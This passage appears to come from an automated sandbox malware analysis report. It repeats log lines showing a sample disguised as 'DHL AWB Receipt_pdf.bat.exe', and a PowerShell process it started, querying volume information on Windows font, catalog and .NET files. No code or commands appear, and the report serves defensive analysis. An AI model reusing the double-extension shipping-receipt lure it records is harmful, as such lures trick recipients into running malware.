                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
